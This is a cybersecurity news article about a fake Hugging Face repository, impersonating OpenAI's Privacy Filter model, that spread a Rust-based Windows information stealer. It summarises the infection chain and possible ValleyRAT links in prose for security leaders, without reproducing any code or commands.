Fake OpenAI Privacy Filter Repo Reaches #1 on Hugging Face, Spreads Info-Stealing Malware
A malicious Hugging Face repository impersonated OpenAI’s Privacy Filter model reached the top trending position, and exposed thousands of users to a Rust-based information stealer targeting Windows systems.
Fake Repository Exploits Trust in OpenAI
Cybercriminals are now targeting the AI and open-source ecosystem by abusing trust.
A fake Hugging Face project pretending to be OpenAI’s Privacy Filter model recently reached the platform’s #1 trending position. It reportedly gained nearly 244,000 downloads in just 18 hours.
However, instead of providing a privacy-focused AI model, the repository delivered a powerful Rust-based information stealer designed for Windows users.
The malicious project used the name Open-OSS/privacy-filter. It closely copied OpenAI’s legitimate repository called openai/privacy-filter.
Attackers duplicated the project description almost word for word. As a result, many developers and researchers believed the repository was genuine.
What Is OpenAI’s Privacy Filter Model?
OpenAI introduced Privacy Filter in April 2026 as an open-weight model.
Its main purpose was to detect and remove personally identifiable information (PII) from unstructured text. This helps organizations improve privacy protection inside AI systems and business workflows.
Because the project came from a trusted source, many users searched for it quickly after release.
Attackers used that trust as their entry point.
How the Malware Infection Worked
The fake repository instructed users to clone the project and run a Windows batch file called start.bat.
It also provided a Python script called loader.py for Linux and macOS users.
Once launched, the Python script disabled SSL verification and decoded a hidden external URL. It then fetched a command and passed it to PowerShell for execution.
This triggered the next stage of the attack.
The PowerShell command downloaded another batch file from a remote server. That script asked for elevated privileges using a User Account Control prompt.
It also added Microsoft Defender exclusions, downloaded another malicious file, and created a scheduled task to launch the final payload.
Final Payload Focused on Data Theft
The final stage was a sophisticated information stealer.
It captured screenshots and collected sensitive data from Discord, cryptocurrency wallets, browser extensions, and FileZilla configurations.
It also searched for wallet seed phrases and stole browser data from Chromium- and Gecko-based browsers.
Additionally, it gathered system information and attempted to disable AMSI and Event Tracing for Windows.
These actions helped the malware avoid detection.
Interestingly, the malware did not create long-term persistence. Instead, it used scheduled tasks as a one-time SYSTEM-level launcher.
This method made detection harder while reducing obvious warning signs.
More Repositories and Possible ValleyRAT Links
Researchers also found six more repositories using similar Python loaders.
This suggests the campaign was not a single isolated attack.
Shared infrastructure also connected the activity to ValleyRAT, also known as Winos 4.0.
ValleyRAT is a modular remote access trojan linked to the Chinese threat group Silver Fox.
This connection raises concerns about a larger supply chain attack targeting open-source ecosystems and AI platforms.
Why CISOs Should Pay Attention
This incident shows a major shift in supply chain security risks.
Many organizations focus on securing code libraries and software packages. However, attackers are now targeting AI model repositories as well.
For CISOs and security leaders, this is a serious warning.
Model repositories must receive the same security checks as software dependencies.
Verification, repository trust validation, sandbox testing, and strong endpoint protection are now essential controls.
As AI adoption grows across UAE enterprises and global organizations, governance around third-party AI assets becomes even more important.
Trust is now part of the attack surface.